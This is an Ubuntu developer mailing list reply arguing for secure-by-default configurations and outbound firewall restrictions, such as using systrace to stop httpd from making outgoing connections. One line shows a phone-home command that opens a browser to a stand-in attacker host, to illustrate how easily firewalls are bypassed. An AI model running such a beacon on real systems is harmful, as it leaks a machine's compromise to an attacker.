On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <[EMAIL PROTECTED]> wrote: > Because as he said, if you pre-configure everything to > super-duper-easy-peasy, you've also pre-configured it to > super-duper-easy-peasy-to-crack. I'm personally disappointed by > firewalls that allow outbound by default, because something could phone > home if I put my trust in an application I shouldn't, but they're > easy-peasy for users, so that's what people do. I can manually go > through and fix it myself, but if some application is running about > opening who knows how many ports and setting god-knows-what services to > auto-start and mucking about with insecure options in config files...how > many months is it going to take me to track all of that down? No way.
Commercial windows firewall pretty much all block outbound traffic by default, popping up a dialog box offering to allow that particular application to access the internet. I understand that it is fairly easily for an attacker to phone home though. For example, just run firefox http://ATTACKER/this-machine-is-cracked. However if it good practice to prevent e.g. httpd making outgoing connections this should be done by default. It is fairly easy to do this with e.g. systrace. The arguments that it is hard to step up these systems to be secure seems to be an argument that they should be secured once, by Ubuntu, with a great deal of scrutiny on whether the configuration really is secure. Even if we assume that everyone will hire a UNIX guru we can't assume that all the "gurus" really are gurus or that they won't forget one tiny exploit. Ubuntu desktop already has one server function. I can right click a file, go to share and share the folder using samba. If you know of any security flaws with this GUI, please report a bug. -- John C. McCabe-Dansted PhD Student University of Western Australia -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
